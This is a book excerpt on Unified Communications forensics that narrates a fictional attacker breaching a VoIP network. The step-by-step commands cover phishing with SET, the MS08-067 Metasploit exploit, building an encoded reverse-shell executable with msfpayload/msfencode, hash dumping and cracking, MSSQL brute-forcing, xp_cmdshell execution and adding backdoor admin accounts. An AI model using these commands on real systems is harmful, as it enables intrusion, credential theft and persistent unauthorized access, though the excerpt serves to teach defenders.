Unified Communications Forensics: Anatomy of Common UC Attacks

In this excerpt from Unified Communications Forensics, learn how hackers gain access into UC systems and how to scan the network for vulnerabilities.

This Content Component encountered an error

The following is an excerpt from the book Unified Communications Forensics written by Nicholas Grant and Joseph W. Shaw II and published by Syngress. This section from chapter 7 reveals how hackers can gain initial access into UC systems and how to scan the network for potential vulnerabilities.

INTRODUCTION

5N|P3R had been having fun with this network and now decided that this VoIP network he was playing with warranted further investigation. He was hoping to gain admin level access to the VoIP server, giving him complete control over their PBX. He also wanted to gain more information about the company along the way, which would come from exploiting as many machines on this network as he could. After all, not only was 5N|P3R interested in VoIP networks, he also wanted to own some machines where he could run C&C Botnets, and do some other nefarious things…

GAINING INITIAL ACCESS

5N|P3R sat staring at his screen, trying to decide on the best method to gain access to this network without raising too many alarms and alerting the administrators and information security group (if they even had one). During 5N|P3R's initial reconnaissance, he had identified about 30 different email addresses; so it had been decided for him: a targeted social engineering email attack would be performed. 5N|P3R started up the Social-Engineer Toolkit (SET) and quickly flew the menu prompts, selecting the options he wanted and adding the email addresses he had identified earlier. 5N|P3R had decided to launch his attack during business hours, thinking that he would have the most success during that time, so he fired off his email attacks at 12:17, thinking that as people returned from lunch they would be clicking on the link he had included within the email. 5N|P3R sat staring at his screen. Three connections popped up on his console. Of the 30 emails he had sent out, 3 had prompted people to click on his malicious link. As soon as they had clicked the link, their machines downloaded a file; when they doubleclicked on this file (which 5N|P3R had crafted) the users were shown a PDF file, but in reality this file had initiated a remote tunnel back to his machine with a command prompt on the victims machines.

Unified Communications Forensics

Authors: Nicholas Grant and Joseph W. Shaw II

Learn more about Unified Communications Forensics from publisher Syngress.

At checkout, use discount code PBTY14 for 25% off

SCANNING THE NETWORK FOR POTENTIAL VULNERABILITIES

5N|P3R quickly dumped the hashes on each of these machines and began searching the machines to see what each of them had installed. Gotcha! 5N|P3R thought to him himself. He had identified one of the machines was running VMware Player. 5N|P3R had cracked some of the passwords from the hash file and was able to log into the machine with a local administrator's password. He quickly downloaded an image of Kali Linux (which is a replacement for backtrack). 5N|P3R extracted the virtual machine's image and booted the Kali machine.

VULNERABILITIES AND EXPLOITS

5N|P3R checked to see what his ip address was and which subnet he was connected to by running the command:

ifconfig

5N|P3R's IP address came back as inet addr:10.0.0.149. 5N|P3R made an educated guess that he was on a /24 subnet and decided to use 10.0.0.0/24 as his subnet.

Discovery Scanning and Identification of Vulnerabilities

Next 5N|P3R quickly fired off an nmap scan to discover what hosts were live on the network to determine what ports on these hosts may be open. 5N|P3R then downloaded Nessus from tenable's Web site at http://www.tenable.com/products/nessus/select-your-operating-system, getting an activation code at http://www.tenable.com/products/nessus/nessus-plugins/obtain-anactivation-code. Then he ran the following commands to install, configure, and start Nessus:

dpkg -i Nessus-5.2.1-debian6_i386.deb

cd /opt/nessus/bin

./nessus-fetch --register "QWERTY-XXXXX-XXXXX-XXXXX"

service nessusd start

Next 5N|P3R launched a browser and surfed over to https://kali:8834. He then created a new scan with the live hosts that he found while running his nmap scan.

A handful of possible vulnerabilities were identified.

5N|P3R has been using Metasploit since it was first released many years ago. Now that Backtrack has become Kali linux, there are a few key differences. Kali linux took a departure from Backtrack and no longer starts a bunch of network services at boot, including database services. In order to get Metasploit up and running 5N|P3R had to issue the following commands:

service postgresql start

msfupdate

msfconsole

msfupdate will automatically start the metasploit rpc server: prosvc and Metasploit Web server. If 5N|P3R had already updated his installation of metasploit, he would have used.

service metasploit start

msfconsole

The first time msfconsole is run, the initial metasploit database will be created. If 5N|P3R wished to start metasploit at boot, he could have issued the following commands.

update-rc.d postgresql enable

update-rc.d metasploit enable

To ensure everything with metasploit is working correctly, 5N|P3R issued the following commands from the msf prompt.

msf > db_status

Which then returned:

[*] postgresql connected to ms

Next he created a workspace for his current "project" and connected to it.

workspace -a voip_network

workspace voip_network

[*] Workspace: voip_network

Any time 5N|P3R wishes to see which workspace he is connected to, he can simply type "workspace" from the msf prompt, which will return all workspaces and include an "*" in front of the currently connected workspace.

msf> workspace

defualt

* voip_network

There are multiple ways to import data from Nessus. Since 5N|P3R has already installed and run a scan from Nessus, he will just connect directly to Nessus from within metasploit to import the data. Once the Nessus module is loaded, the report_list command will list out scans that are available from with Nessus.

load_nessus

nessus_connect secvoip:secvoip@kali:8834 ok

nessus_report_list

nessus_report get

4e29b60e-d9d4-65ba-7343-6d69109fc2fccfbb8e8a4bf77d2b

Once the following commands complete the response, "Done" is returned, letting 5N|P3R know that the command has completed successfully. Next 5N|P3R issues the "Run" command, which lists out hosts that have been imported from Nessus into Metasploit. This command also shows the name of the OS and Version.

5N|P3R remembered some of the critical vulnerabilities he saw listed in Nessus, one of which was that the Windows XP host at 10.0.0.146 looks to be running SP1. As such, he knew that the hosts would most likely be vulnerable to the MS08-067 exploit, so next he issued the following commands in the Metasploit console:

search ms08-067

use exploit/windows/smb/ms08_067_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

show options

5N|P3R then issued the commands to set the options for this specific module:

set RHOST

set LHOST

set LPORT 80

He next ran the module to exploit the machine with the exploit command. Much as 5N|P3R had expected, the module ran and the machine was exploited using the MS08-067 vulnerability, and was greeted with the meterpreter > shell. He then issued the sysinfo command to see basic information about the machine he had just owned, then he ran the hashdump command to dump the hashes on the machine.

Read the full excerpt

Download the PDF of chapter 7 to learn more!

There are many attacks in which these hashes can be used, such as the "pass the hash" attack. But 5N|P3R always likes to have as many options available to him as possible, so he decided to try and crack the passwords of these hashes. He cut and pasted the user names and hash values into a plain text file he named hash.txt. 5N|P3R then used the tool John the Ripper to begin cracking these hashed passwords. Ten minutes later, 5N|P3R checked his console and saw the following output, where the Adminsitrator and secvoip accounts had been cracked. The way Microsoft stores passwords is in two halves, so the Administrator password is gained from combining (Administrator:1) and (Administrator:2) for a password of "anywhere". The same is done with the secvoip account, which reveals the password to be "n3v3rgu3ss." Left running long enough, the other three accounts, Guest, HelpAssistant, and SUPPORT, would eventually have been cracked, but 5N|P3R knows these default accounts will not provide as much access as Administrator and secvoip.

5N|P3R ran through the gambit of post exploitation modules included in Metasploit, but he came up with nothing. So he began searching the exploited system's hard-drive for common files, using the search command in meterpreter. 5N|P3R searched for files with the extension .txt, .pwd, and .vnc on the computer he had just owned. With the command search -f *.vnc, he received three hits that looked promising. All three hits were for the file named "10.0.0.147.vnc." He quickly ran the command from the meterpreter download "c:\\\\Documents and Settings\\Administrator\\Desktop\\10.0.0.147.vnc" which downloaded the "10.0.0.147.vnc" file to his local machine.

Looking at the contents of the file, he quickly discovered that this file had the stored password to the vnc server running on the host machine at 10.0.0.0147.

5N|P3R fired up a Windows XP virtual machine and downloaded and installed the tightvnc client. Next he copied the contents of the 10.0.0.147.vnc file, which he had downloaded to his Kali Linux machine. Then he opened up notepad.exe on the XP virtual machine and pasted the contents into the document. 5N|P3R clicked file and saved this file as "10.0.0.147.vnc" to the desktop. 5N|P3R next simply double-clicked on the file he had just created and now had access to this new host at 10.0.0.147.vnc. He opened up a command prompt and ran ipconfig to make sure he was indeed attached to the host he was expecting. Next he decided to add an account: net user /add hack password1 and then added his user hack to the local administrator's group: net localgroup administrators /add hack.

5N|P3R used msfpayload and msfencode to create and encode an executable and then copied this "exploit.exe" file to the host at 10.0.0.147 (The same system which he had just used tightvnc in connect to remotely). The "exploit. exe" once executed would then connect back to his Kali Linux box with a meterpreter shell, so he issued the command for msfcli to listen for the incoming meterpreter connection.

msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.149

LPORT=80 EXITFUNC=thread

msfencode–e x86/shikata_ga_nai–c 2 –t raw | msfencode–e x86/

jmp_call_additive –c 2 –t raw |

msfencode–e x86/call4_dword_xor–c 2 –t raw | msfencode–e x86/

shikata_ga_nai–c 2 > exploit.exe

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_

tcp LHOST=10.0.0.149 LPORT=80 E

After executing his "exploit.exe" file, 5N|P3R received a connection to a meterpreter shell.

5N|P3R then ran the same two commands he always does, sysinfo and hashdump, and again copied the hashes to a plain text file, and began running john against this new file. He once again began running through the post exploitation modules; however, this time, upon issuing the command run post/windows/ gather/credentials/mremote he received a user name and password for the machine at 10.0.0.199; which he had previously identified as the PBX VoIP machine that he was ultimately after.

With these new credentials,5N|P3R dropped to a command prompt and issued the command:

ssh root@10.0.0.199

5N|P3R then entered the password "pbxadmin" which he had just received while running the post mremote module and was granted root access to the PBX, which also told him that there was a web gui running at http://10.0.0.199 Excellent!!! he thought to himself.

5N|P3R backgrounded the current meterpreter shells he had and decided to take a look at some other services or applications that he might be able to exploit. Noticing that there appeared to be a few instances of SQL running on the network 5N|P3R began a more in-depth scan of these instances . Back at the msf console, he loaded up the mssql_login module and ran it against the entire subnet.

use auxiliary/scanner/mssql/mssql_ping

hosts –R

exploit

More on UC security from SearchSecurity

Unified communications infrastructure threats and defense strategies

How to avoid VoIP security risks: Forrester's six-step process

UC: Securing the converged infrastructure

5N|P3R now had a listing of all the MSSQL servers, the port each server was running on, and the Instance Name. He knew that one of these would be vulnerable to the xp_cmdshell function, but before he could successfully utilize the xp_cmdshell auxiliary module, he would need to know the sa accounts password. With all the MSSQL servers running on different ports, he would have to try brute-forcing each instance of MSSQL individually. So in Metasploit, he loaded up the brute force module for MSSQL and set the password file:

use auxiliary/scanner/mssql/mssql_login

set PASS_FILE /usr/share/john/password.lst

5N|P3R began to run through the IPs of the MSSQL servers. Setting the RHOST and RPORT values for each server, he started to wonder if he was ever going to find a password with which he would be able to add an account utilizing xp_cmdshell. On the last MSSQL server, he let out a sigh of relief as it returned "successful login."

With all the information needed to utilize the xp_cmdshell to add an account and add that account to the local administrators group, he loaded and set the variables for the mssql_exec module.

use auxiliary/scanner/mssql/mssql_exec

set RPORT 53340

set RHOST 10.0.0.148

set PASSWORD Dbmaster123

set cmd net user /add hack hack123

show options

He then issued the run command and the module's output returned The command completed successfully.

5N|P3R had successfully added an account named "hack," so he changed the CMD that the module would run, he needed to add his new "hack" account to the local administrators group and successfully ran:

set CMD net localgroup administrators hack /add

run

Once again he saw: 'The command completed successfully' message returned from the msf console he then ran the command services -p 3389 and it returned that the machine at 10.0.0.148, which he had just successfully created an account on, already had rdp enabled. 5N|P3R then clicked on "Start" and then "run" and typed in "mstsc.exe" and pressed "enter" on his Windows XP virtual machine. He was greeted with a login prompt; he entered "hack" for the username and "hack123" for the password and pressed "enter." He was then logged into the 10.0.0.148 machine.

5N|P3R began browsing the local machine's directories (as he had added his "hack" user account to the local administrators group); he was able to look through each user's files on this machine. On the desktop of the Administrator's Desktop, he found a PBXADMINTOOLS directory which contained putty and a batch file. Opening the voipserver.bat file 5N|P3R found that it was a simple batch file which launched putty, but the creator had stored the settings along with the password for root on the PBX server.

 

About the authors:
Nicholas Grant is an information security professional with over ten years of experience within the industry. He holds a CISSP and has an M.S. in Management of Information Systems Security from Colorado Technical Institute. He works as a Vulnerability Manager for a large financial institution and is a professor, teaching Bachelor's and Associate-level courses at a nationally accredited university.

Joseph W. Shaw II (CISM, CISSP, EnCE, GAWN) has been working in Information Security for over 18 years, with experience in industry verticals including telecommunications, energy, luxury retail, legal, and healthcare. He is now a consultant for a large worldwide professional services company, where he provides expertise in Digital Forensics with an emphasis on incident response, malware analysis and reverse engineering, vulnerability assessment, penetration testing, and security even and incident management.

This was first published in April 2014

Dig deeper on Social media security risks and real-time communication security

Pro+

Features

Enjoy the benefits of Pro+ membership, learn more and join.

0 comments

Oldest 

Forgot Password?

No problem! Submit your e-mail address below. We'll send you an email containing your password.

Your password has been sent to:

-ADS BY GOOGLE

SearchCloudSecurity

SearchNetworking

SearchCIO

SearchConsumerization

SearchEnterpriseDesktop

SearchCloudComputing

ComputerWeekly

Close